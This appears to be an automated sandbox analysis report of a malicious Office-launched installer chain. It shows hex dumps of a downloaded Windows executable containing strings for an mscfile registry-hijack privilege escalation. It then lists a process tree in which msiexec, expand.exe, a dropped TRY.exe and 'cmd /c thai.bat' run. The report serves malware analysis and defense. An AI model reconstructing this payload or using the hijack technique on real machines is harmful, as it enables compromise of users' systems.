2022-04-20 07:28:45 UTC	660	IN	Data Raw: c3 83 fe 01 5e 75 04 8b d1 8b c8 e9 8b ff ff ff 83 39 00 75 07 85 d2 75 07 33 c0 c3 85 d2 74 05 83 39 00 74 06 83 79 08 01 75 04 83 c8 ff c3 83 39 01 7e 04 33 c0 40 c3 8b 41 0c 8b 00 3b c2 77 f3 1b c0 c3 56 57 8b fa 8b f1 e8 13 f3 ff ff 33 d2 42 e8 fc f1 ff ff 8b d0 85 d2 75 15 8b 4e 0c 81 e7 ff ff ff 0f 89 39 8b 4e 0c 39 01 0f 95 c0 89 06 5f 8b c2 5e c3 55 8b ec 83 ec 18 53 56 8b f2 8b d9 57 8d 4d ec 8b 16 e8 dc 14 00 00 85 c0 75 58 8d 45 ec 33 ff 50 57 8b d6 8b cb e8 4f 00 00 00 8b d8 59 59 85 db 74 0c 8d 4d ec e8 b1 ef ff ff 8b c3 eb 34 39 7d ec 74 1a 8b 45 f4 3b 46 08 74 12 ff 75 08 8d 55 ec 8b ce e8 c4 02 00 00 59 8b f8 eb 0b 8b 55 08 8d 4d ec e8 c7 f2 ff ff 8d 4d ec e8 7b ef ff ff 8b c7 5f 5e 5b 8b e5 5d c3 83 ec 4c 53 55 56 8b ea 8b f1 57 33 ff 89 Data Ascii: ^u9uu3t9tyu9~3@A;wVW3BuN9N9_^USVWMuXE3PWOYYtM49}tE;FtuUYUMM{_^[]LSUVW3
2022-04-20 07:28:45 UTC	676	IN	Data Raw: 66 39 88 18 00 40 00 75 3e 8b 45 08 b9 00 00 40 00 2b c1 50 51 e8 69 fe ff ff 59 59 85 c0 74 27 83 78 24 00 7c 21 c7 45 fc fe ff ff ff b0 01 eb 1f 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 32 c0 e8 a1 07 00 00 c3 55 8b ec e8 38 07 00 00 85 c0 74 0f 80 7d 08 00 75 09 33 c0 b9 e4 bc 46 00 87 01 5d c3 55 8b ec 80 3d 00 bd 46 00 00 74 06 80 7d 0c 00 75 12 ff 75 08 e8 21 f1 00 00 ff 75 08 e8 65 48 00 00 59 59 b0 01 5d c3 55 8b ec a1 0c b0 46 00 8b c8 33 05 e8 bc 46 00 83 e1 1f ff 75 08 d3 c8 83 f8 ff 75 07 e8 5a ef 00 00 eb 0b 68 e8 bc 46 00 e8 be ef 00 00 59 f7 d8 59 1b c0 f7 d0 23 45 08 5d c3 55 8b ec ff 75 08 e8 ba ff ff ff f7 d8 59 1b c0 f7 d8 48 5d c3 e9 cb 75 00 00 55 8b ec ff 75 08 e8 f0 ff ff ff 59 5d c3 55 Data Ascii: f9@u>E@+PQiYYt'x$\|!EE38eE2U8t}u3F]U=Ft}uu!ueHYY]UF3FuuZhFYY#E]UuYH]uUuY]U
2022-04-20 07:28:45 UTC	692	IN	Data Raw: 0a 0f b6 06 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 04 45 ff ff ff ff 85 c0 75 6a 0f b6 4a 01 0f b6 46 01 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 04 45 ff ff ff ff 85 c0 75 4c 0f b6 4a 02 0f b6 46 02 eb 9d 8b 55 08 8b 75 0c 0f b6 0a 0f b6 06 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 04 45 ff ff ff ff 85 c0 75 20 0f b6 4a 01 0f b6 46 01 e9 6e ff ff ff 8b 45 08 0f b6 08 8b 45 0c 0f b6 00 e9 5d ff ff ff 33 c0 5e 5b 5d c3 8b ff 94 3e 43 00 b0 42 43 00 f5 46 43 00 2b 4b 43 00 11 3e 43 00 19 42 43 00 5e 46 43 00 94 4a 43 00 7a 3d 43 00 81 41 43 00 c6 45 43 00 fd 49 43 00 e2 3c 43 00 ea 40 43 00 2f 45 43 00 65 49 43 00 4b 3c 43 00 53 40 43 00 98 44 43 00 ce 48 43 00 b4 3b 43 00 bc 3f 43 00 01 44 43 00 37 48 43 00 1d 3b 43 00 25 3f 43 00 6a 43 43 00 a0 47 43 00 86 3a 43 00 9e Data Ascii: +t3EujJF+t3EuLJFUu+t3Eu JFnEE]3^[]>CBCFC+KC>CBC^FCJCz=CACECIC<C@C/ECeICK<CS@CDCHC;C?CDC7HC;C%?CjCCGC:C
2022-04-20 07:28:45 UTC	708	IN	Data Raw: c0 30 03 04 8d 00 c8 46 00 b9 40 b3 46 00 eb 07 b9 40 b3 46 00 8b c1 80 78 29 00 75 22 83 fa ff 74 17 83 fa fe 74 12 8b c2 c1 f8 06 83 e2 3f 6b ca 30 03 0c 85 00 c8 46 00 f6 41 2d 01 74 28 e8 2d 09 00 00 c7 00 16 00 00 00 e8 0c f6 ff ff 6a fe 8d 4d f0 51 68 0c b0 46 00 e8 f1 dd ff ff 83 c4 0c e9 58 ff ff ff 56 ff 75 08 e8 fc fe ff ff 59 59 8b f8 89 7d e4 c7 45 fc fe ff ff ff e8 0e 00 00 00 8b c7 e8 6c 87 ff ff c3 8b 75 0c 8b 7d e4 56 e8 bd 05 00 00 59 c3 8b ff 55 8b ec 8b 4d 08 56 8d 71 0c 8b 06 24 03 3c 02 74 04 33 c0 eb 4b 8b 06 a8 c0 74 f6 8b 41 04 57 8b 39 2b f8 89 01 83 61 08 00 85 ff 7e 30 57 50 51 e8 0b cd 00 00 59 50 e8 bf d7 00 00 83 c4 0c 3b f8 74 0b 6a 10 58 f0 09 06 83 c8 ff eb 11 8b 06 c1 e8 02 a8 01 74 06 6a fd 58 f0 21 06 33 c0 5f 5e 5d c3 Data Ascii: 0F@F@Fx)u"tt?k0FA-t(-jMQhFXVuYY}Elu}VYUMVq$<t3KtAW9+a~0WPQYP;tjXtjX!3_^]
2022-04-20 07:28:45 UTC	724	IN	Data Raw: 28 50 51 8b cf e8 5f e4 ff ff 50 8b cf e8 2a e3 ff ff 50 8d 45 f8 53 50 e8 e7 af 00 00 8b 46 20 83 c4 28 c1 e8 05 5b a8 01 74 13 83 7e 28 00 75 0d ff 76 08 ff 76 34 e8 33 e9 ff ff 59 59 0f b7 46 32 6a 67 59 66 3b c1 74 08 6a 47 59 66 3b c1 75 17 8b 46 20 c1 e8 05 a8 01 75 0d ff 76 08 ff 76 34 e8 16 e8 ff ff 59 59 8b 46 34 80 38 2d 75 08 83 4e 20 40 40 89 46 34 8b 56 34 8a 02 3c 69 74 0c 3c 49 74 08 3c 6e 74 04 3c 4e 75 07 6a 73 58 66 89 46 32 8d 7a 01 8a 0a 42 84 c9 75 f9 2b d7 b0 01 5f 89 56 38 5e 8b e5 5d c3 8b ff 56 8b f1 57 ff 76 2c 0f b6 46 31 50 ff 76 04 ff 36 e8 16 e3 ff ff 83 c4 10 8d 7e 40 84 c0 74 39 83 46 14 04 8b 46 14 53 8b 9f 04 04 00 00 0f b7 40 fc 85 db 75 02 8b df 50 8b cf e8 4e e2 ff ff 50 8d 46 38 53 50 e8 23 a6 00 00 83 c4 10 5b 85 c0 Data Ascii: (PQ_P*PESPF ([t~(uvv43YYF2jgYf;tjGYf;uF uvv4YYF48-uN @@F4V4<it<It<nt<NujsXfF2zBu+_V8^]VWv,F1Pv6~@t9FFS@uPNPF8SP#[
2022-04-20 07:28:45 UTC	740	IN	Data Raw: f8 89 85 40 fe ff ff 0f 84 17 01 00 00 6a 3b 58 66 39 03 0f 84 0b 01 00 00 8b bd 40 fe ff ff bb ec 83 45 00 c7 85 3c fe ff ff 01 00 00 00 57 56 ff 33 e8 06 be 00 00 83 c4 0c 85 c0 75 1c 8b 0b 8d 51 02 66 8b 01 83 c1 02 66 3b 85 34 fe ff ff 75 f1 2b ca d1 f9 3b f9 74 11 ff 85 3c fe ff ff 83 c3 0c 81 fb 1c 84 45 00 7e c3 8b 9d 30 fe ff ff 83 c3 02 68 7c 75 46 00 53 e8 6e bd 00 00 8b bd 38 fe ff ff 8b f0 59 59 85 f6 75 0c 6a 3b 58 66 39 03 0f 85 8b 00 00 00 83 bd 3c fe ff ff 05 7f 5f 56 53 8d 85 f4 fe ff ff 68 83 00 00 00 50 e8 a4 ad 00 00 83 c4 10 85 c0 0f 85 6a 01 00 00 8d 04 36 3d 06 01 00 00 0f 83 57 01 00 00 33 c9 66 89 8c 05 f4 fe ff ff 8d 85 f4 fe ff ff 50 ff b5 3c fe ff ff 57 e8 4c 01 00 00 83 c4 0c 85 c0 8b 85 44 fe ff ff 74 0f 40 89 85 44 fe ff ff Data Ascii: @j;Xf9@E<WV3uQff;4u+;t<E~0h\|uFSn8YYuj;Xf9<_VShPj6=W3fP<WLDt@D
2022-04-20 07:28:45 UTC	756	IN	Data Raw: 9e c7 46 00 50 0f b7 05 9c c7 46 00 50 66 39 1d 94 c7 46 00 75 1f 0f b7 05 98 c7 46 00 53 50 0f b7 05 9a c7 46 00 50 0f b7 05 96 c7 46 00 50 ff 76 14 57 eb 16 0f b7 05 9a c7 46 00 50 0f b7 05 96 c7 46 00 53 53 50 ff 76 14 53 57 e8 ce 00 00 00 83 c4 2c eb 4f 6a 03 58 6a 02 5a 33 db 6a 0b 43 5f 83 f9 6b 7d 0c 6a 04 58 6a 0a 5f 33 d2 6a 05 42 5b 6a 00 6a 00 6a 00 6a 02 6a 00 6a 00 52 50 51 6a 01 6a 00 e8 94 00 00 00 33 c0 50 50 50 6a 02 50 50 53 57 ff 76 14 6a 01 6a 01 e8 7d 00 00 00 83 c4 58 8b 15 2c b3 46 00 8b 3d 38 b3 46 00 8b 4e 1c 3b d7 7d 1a 3b ca 7c 26 3b cf 7f 22 3b ca 7e 22 3b cf 7d 1e 33 c0 40 5f 5e 5b 8b e5 5d c3 3b cf 7c f2 3b ca 7f ee 3b cf 7e 08 3b ca 7d 04 33 c0 eb e5 6b 46 08 3c 03 46 04 6b c0 3c 03 06 69 f0 e8 03 00 00 33 c0 3b ca 75 0b 3b Data Ascii: FPFPf9FuFSPFPFPvWFPFSSPvSW,OjXjZ3jC_k}jXj_3jB[jjjjjjRPQjj3PPPjPPSWvjj}X,F=8FN;};\|&;";~";}3@_^[];\|;;~;}3kF<Fk<i3;u;
2022-04-20 07:28:45 UTC	772	IN	Data Raw: fc 66 0f 59 c8 f2 0f 59 d8 66 0f 58 ca 66 0f 28 f7 66 0f 15 f6 66 0f 59 cb 83 ec 10 66 0f 28 c1 66 0f 15 c9 f2 0f 58 c1 f2 0f 58 c6 f2 0f 58 c7 66 0f 13 44 24 04 dd 44 24 04 83 c4 10 c3 66 0f 12 44 24 04 66 0f 28 0d 10 a3 45 00 f2 0f c2 c8 00 66 0f c5 c1 00 83 f8 00 77 48 83 f9 ff 74 5e 81 f9 fe 07 00 00 77 6c 66 0f 12 44 24 04 66 0f 28 0d a0 a2 45 00 66 0f 28 15 00 a3 45 00 66 0f 54 c1 66 0f 56 c2 f2 0f c2 d0 00 66 0f c5 c2 00 83 f8 00 74 07 dd 05 38 a3 45 00 c3 ba e8 03 00 00 eb 4f 66 0f 12 15 00 a3 45 00 f2 0f 5e d0 66 0f 12 0d 30 a3 45 00 ba 02 00 00 00 eb 34 66 0f 12 0d 20 a3 45 00 f2 0f 59 c1 ba cc ff ff ff e9 2f fe ff ff 83 c1 01 81 e1 ff 07 00 00 81 f9 ff 07 00 00 73 3a 66 0f 57 c9 f2 0f 5e c9 ba 03 00 00 00 83 ec 1c 66 0f 13 4c 24 10 89 54 24 0c Data Ascii: fYYfXf(ffYf(fXXXfD$D$fD$f(EfwHt^wlfD$f(Ef(EfTfVft8EOfE^f0E4f EY/s:fW^fL$T$
2022-04-20 07:28:45 UTC	788	IN	Data Raw: 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 98 b2 46 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 78 b1 46 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 ae 57 ff ff ff b6 88 00 00 00 e8 f3 f1 ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 8c 57 ff ff ff b6 88 00 00 00 e8 8b f6 ff ff 59 59 ff 76 7c e8 77 57 ff ff ff b6 88 00 00 00 e8 6c 57 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 4a 57 ff ff 8b 86 94 00 00 00 bf Data Ascii: ttVjH(^yFttytQtuNY^]UQSVuWtl=xFteF\|t^8uYt8uPWYYt8uPWYYv\|wWlWYYtE8u@-PJW
2022-04-20 07:28:45 UTC	804	IN	Data Raw: 8d 85 30 fe ff ff 53 50 e8 51 17 ff ff 83 c4 10 32 c0 e9 37 ff ff ff 83 a5 9c f6 ff ff 00 83 a5 2c fe ff ff 00 6a 00 eb 0f 33 c0 50 89 85 2c fe ff ff 89 85 9c f6 ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 53 50 e8 12 17 ff ff 83 c4 10 8b bd 84 f8 ff ff 8b f7 8b 8d 2c fe ff ff 89 b5 b4 f8 ff ff 85 c9 74 77 33 f6 33 ff 8b 84 bd 30 fe ff ff 6a 0a 5a f7 e2 03 c6 89 84 bd 30 fe ff ff 83 d2 00 47 8b f2 3b f9 75 e1 89 b5 9c f8 ff ff 85 f6 8b b5 b4 f8 ff ff 74 42 8b 8d 2c fe ff ff 83 f9 73 73 11 8b c2 89 84 8d 30 fe ff ff ff 85 2c fe ff ff eb 26 33 c0 50 89 85 9c f6 ff ff 89 85 2c fe ff ff 8d 85 a0 f6 ff ff 50 8d 85 30 fe ff ff 53 50 e8 85 16 ff ff 83 c4 10 8b fe 8d 85 5c fc ff ff 50 8d 85 2c fe ff ff 50 e8 bf 11 ff ff 59 59 6a 0a 5a 3b c2 0f 85 91 00 00 00 ff Data Ascii: 0SPQ27,j3P,P0SP,tw330jZ0G;utB,ss0,&3P,P0SP\P,PYYjZ;
2022-04-20 07:28:45 UTC	820	IN	Data Raw: 01 00 00 00 20 4a 45 00 82 00 00 00 38 4a 45 00 8c 00 00 00 50 4a 45 00 85 00 00 00 68 4a 45 00 0d 00 00 00 74 4a 45 00 86 00 00 00 88 4a 45 00 87 00 00 00 98 4a 45 00 1e 00 00 00 b0 4a 45 00 24 00 00 00 c8 4a 45 00 0b 00 00 00 e8 4a 45 00 22 00 00 00 08 4b 45 00 7f 00 00 00 1c 4b 45 00 89 00 00 00 34 4b 45 00 8b 00 00 00 44 4b 45 00 8a 00 00 00 54 4b 45 00 17 00 00 00 60 4b 45 00 18 00 00 00 80 4b 45 00 1f 00 00 00 94 4b 45 00 72 00 00 00 a4 4b 45 00 84 00 00 00 c4 4b 45 00 88 00 00 00 d4 4b 45 00 61 64 64 72 65 73 73 20 66 61 6d 69 6c 79 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 00 00 00 00 61 64 64 72 65 73 73 20 69 6e 20 75 73 65 00 00 61 64 64 72 65 73 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 00 00 00 61 6c 72 65 61 64 79 20 63 6f 6e 6e 65 63 74 Data Ascii: JE8JEPJEhJEtJEJEJEJE$JEJE"KEKE4KEDKETKE`KEKEKErKEKEKEaddress family not supportedaddress in useaddress not availablealready connect
2022-04-20 07:28:45 UTC	836	IN	Data Raw: a2 25 76 7d 8d 71 4e 01 00 00 64 fb e6 83 5a f2 0f ad 57 94 11 b5 80 00 66 b5 29 20 cf d2 c5 d7 7d 6d 3f a5 1c 4d b7 cd de 70 9d da 3d 41 16 b7 4e ca d0 71 98 13 e4 d7 90 3a 40 4f e2 3f ab f9 6f 77 4d 26 e6 af 0a 03 00 00 00 10 31 55 ab 09 d2 58 0c a6 cb 26 61 56 87 83 1c 6a c1 f4 87 75 76 e8 44 2c cf 47 a0 41 9e 05 08 c9 3e 06 ba a0 e8 c8 cf e7 55 c0 fa e1 b2 44 01 ef b0 7e 20 24 73 25 72 d1 81 f9 b8 e4 ae 05 15 07 40 62 3b 7a 4f 5d a4 ce 33 41 e2 4f 6d 6d 0f 21 f2 33 56 e5 56 13 c1 25 97 d7 eb 28 84 eb 96 d3 77 3b 49 1e ae 2d 1f 47 20 38 ad 96 d1 ce fa 8a db cd de 4e 86 c0 68 55 a1 5d 69 b2 89 3c 12 24 71 45 7d 10 00 00 41 1c 27 4a 17 6e 57 ae 62 ec aa 89 22 ef dd fb a2 b6 e4 ef e1 17 f2 bd 66 33 80 88 b4 37 3e 2c b8 bf 91 de ac 19 08 64 f4 d4 4e 6a ff Data Ascii: %v}qNdZWf) }m?Mp=ANq:@O?owM&1UX&aVjuvD,GA>UD~ $s%r@b;zO]3AOmm!3VV%(w;I-G 8NhU]i<$qE}A'JnWb"f37>,dNj
2022-04-20 07:28:45 UTC	852	IN	Data Raw: 00 00 5d 33 bc 19 b9 3f 7f fe 03 ed 82 60 24 3d 00 40 c0 d7 b9 c6 bb 3f 58 26 65 42 e8 b7 45 3d 00 80 dc e1 72 72 be 3f 5c a2 33 23 a9 2e 4a 3d 00 c0 0e 82 d7 8c c0 3f 06 02 b4 11 c5 43 35 3d 00 c0 33 3a 8f dc c1 3f 4c 74 6d ab 8c 59 45 3d 00 40 af 27 7a 2b c3 3f b1 22 65 fd a1 ab 07 3d 00 00 74 4c 56 76 c4 3f 70 8f 9b 24 9f c3 4d 3d 00 60 90 64 48 c0 c5 3f 68 36 5f 7e d4 c5 28 3d 00 60 78 ef a4 07 c7 3f f8 e6 1d 59 ea 86 4f 3d 00 80 c3 fa 59 4c c8 3f 77 4a b1 51 d3 5c 43 3d 00 c0 ac 6a 55 8e c9 3f 10 ee 56 d1 88 1c 34 3d 00 e0 2b 03 30 cf ca 3f 65 91 bf de 33 37 2e 3d 00 60 ae 13 32 0d cc 3f ed e2 8b b1 bc 15 4b 3d 00 60 d6 d6 f9 49 cd 3f 29 2d a1 c2 57 b5 30 3d 00 00 2d 8a c9 83 ce 3f f2 18 0d d1 f5 2a 44 3d 00 e0 96 e3 44 bc cf 3f 37 54 66 28 f9 b3 47 Data Ascii: ]3?`$=@?X&eBE=rr?\3#.J=?C5=3:?LtmYE=@'z+?"e=tLVv?p$M=`dH?h6_~(=`x?YO=YL?wJQ\C=jU?V4=+0?e37.=`2?K=`I?)-W0=-?*D=D?7Tf(G
2022-04-20 07:28:45 UTC	868	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 4b 65 65 70 41 6c 69 76 65 20 7c 20 44 69 73 61 62 6c 65 64 00 21 00 00 00 43 6f 6e 6e 65 63 74 69 6f 6e 20 54 69 6d 65 6f 75 74 00 00 44 69 73 70 6c 61 79 4d 65 73 73 61 67 65 00 00 47 65 74 4d 65 73 73 61 67 65 00 00 43 6c 6f 73 65 43 68 61 74 00 00 00 01 00 00 00 00 00 00 00 63 6d 64 2e 65 78 65 00 53 79 73 74 65 6d 44 72 69 76 65 00 5c 00 00 00 0a 00 00 00 46 00 00 00 32 00 00 00 6f 00 70 00 65 00 6e 00 00 00 00 00 33 00 00 00 31 00 00 00 30 00 00 00 4d 00 00 00 6d 73 63 66 69 6c 65 5c 73 68 65 6c 6c 5c 6f 70 65 6e 5c 63 6f 6d 6d 61 6e 64 00 00 6f 72 69 67 6d 73 63 00 00 00 00 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 43 00 6c 00 61 00 73 00 73 00 65 00 73 00 5c 00 6d 00 73 00 63 00 66 00 69 00 6c 00 65 Data Ascii: Connection KeepAlive \| Disabled!Connection TimeoutDisplayMessageGetMessageCloseChatcmd.exeSystemDrive\F2open310Mmscfile\shell\open\commandorigmscSoftware\Classes\mscfile
2022-04-20 07:28:45 UTC	884	IN	Data Raw: 46 46 46 46 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 43 39 37 42 45 46 43 35 34 42 44 37 41 38 42 36 35 41 43 46 38 39 46 38 31 44 34 44 34 41 44 43 35 36 35 46 41 34 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 46 34 43 Data Ascii: FFFFC1C97BEFC54BD7A8B65ACF89F81D4D4ADC565FA45100000000000000000001F4C
2022-04-20 07:28:45 UTC	900	IN	Data Raw: fe ff ff ff 00 00 00 00 c4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 1b 8e 43 00 00 00 00 00 00 00 00 00 ee 8d 43 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 69 8f 43 00 00 00 00 00 fe ff ff ff 00 00 00 00 d0 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 c9 90 43 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 aa 92 43 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 21 96 43 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 ec 98 43 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 00 30 9a 43 00 00 00 00 00 fe ff ff ff 00 00 00 00 d4 ff ff ff 00 00 00 00 fe ff ff ff 00 00 00 Data Ascii: CCiCCC!CC0C
2022-04-20 07:28:45 UTC	916	IN	Data Raw: 0e 60 1b ff 00 02 00 ff 00 00 00 ff 60 60 60 ff ea 84 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 99 00 ff 2b 28 2a ff 00 08 00 ff 00 16 00 ff 00 04 00 ff 00 1d 00 ff 00 1c 00 ff 00 21 00 ff 00 11 00 ff 00 0f 00 ff 00 1e 00 ff 00 28 00 ff 00 21 00 ff 03 3c 06 ff 06 3a 09 ff 00 00 00 ff 00 17 00 ff 00 00 00 ff 59 57 59 ff ea 84 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 99 00 ff 28 28 26 ff 0e 70 22 ff 11 7a 21 ff 00 18 00 ff 1b 9e 38 ff 1d a2 3c ff 23 b1 47 ff 13 6f 27 ff 06 3e 0b ff 1e aa 3e ff 19 92 33 ff 1a 92 33 ff 20 a7 3e ff 17 83 2d ff 00 13 00 ff 20 a6 41 ff 00 32 06 ff 51 4f 51 ff ea 84 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 99 00 ff 28 27 27 ff 00 29 02 ff 00 22 00 ff 00 00 00 ff 04 3c 0c ff 00 13 00 Data Ascii: ````+(*!(!<:YWY((&p"z!8<#Go'>>33 >- A2QOQ('')"<
2022-04-20 07:28:45 UTC	932	IN	Data Raw: 00 10 00 00 dc 01 00 00 01 30 0b 30 17 30 21 30 2d 30 37 30 4b 30 57 30 65 30 6f 30 7b 30 85 30 91 30 9b 30 a9 30 b3 30 bf 30 c9 30 d7 30 e1 30 ed 30 f7 30 03 31 0d 31 1b 31 25 31 36 31 47 31 55 31 5f 31 6d 31 77 31 83 31 8d 31 99 31 a3 31 af 31 b9 31 c5 31 cf 31 db 31 e5 31 f1 31 fb 31 07 32 11 32 1d 32 27 32 33 32 3d 32 49 32 53 32 5f 32 69 32 75 32 7f 32 8d 32 9a 32 a4 32 b2 32 bc 32 c8 32 d2 32 de 32 e8 32 f4 32 fe 32 0a 33 14 33 22 33 2c 33 3a 33 44 33 50 33 5a 33 68 33 72 33 80 33 8a 33 98 33 a2 33 ae 33 b3 33 b9 33 c0 33 c5 33 cb 33 d5 33 e1 33 eb 33 f7 33 01 34 0f 34 19 34 25 34 2f 34 3b 34 45 34 53 34 5d 34 69 34 6e 34 74 34 7b 34 80 34 86 34 8b 34 91 34 98 34 9d 34 a3 34 ad 34 b9 34 c5 34 d1 34 dd 34 e7 34 da 36 f1 36 08 37 0f 37 28 37 31 37 36 Data Ascii: 000!0-070K0W0e0o0{000000000000111%161G1U1_1m1w1111111111111222'232=2I2S2_2i2u222222222222233"3,3:3D3P3Z3h3r333333333333333444%4/4;4E4S4]4i4n4t4{444444444444446677(7176

Target ID:	0
Start time:	09:28:06
Start date:	20/04/2022
Path:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0xde0000
File size:	1937688 bytes
MD5 hash:	0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	09:28:12
Start date:	20/04/2022
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7b26c0000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	09:28:16
Start date:	20/04/2022
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 2C09DD3AEE1859E1D48AC181D73EE6A9
Imagebase:	0x50000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	7
Start time:	09:28:20
Start date:	20/04/2022
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Imagebase:	0xce0000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	9
Start time:	09:28:22
Start date:	20/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	10
Start time:	09:28:23
Start date:	20/04/2022
Path:	C:\Windows\SysWOW64\expand.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Imagebase:	0xa60000
File size:	52736 bytes
MD5 hash:	8F8C20238C1194A428021AC62257436D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Target ID:	11
Start time:	09:28:26
Start date:	20/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	12
Start time:	09:28:27
Start date:	20/04/2022
Path:	C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\MW-83d1b0f2-4b81-4e9a-9d2c-09943d46edb9\files\TRY.exe"
Imagebase:	0x7ff6bac40000
File size:	155136 bytes
MD5 hash:	96DF7B0C491646EFC2E5F2E9F0443B8B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Target ID:	13
Start time:	09:28:29
Start date:	20/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c thai.bat
Imagebase:	0x7ff602050000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	14
Start time:	09:28:29
Start date:	20/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
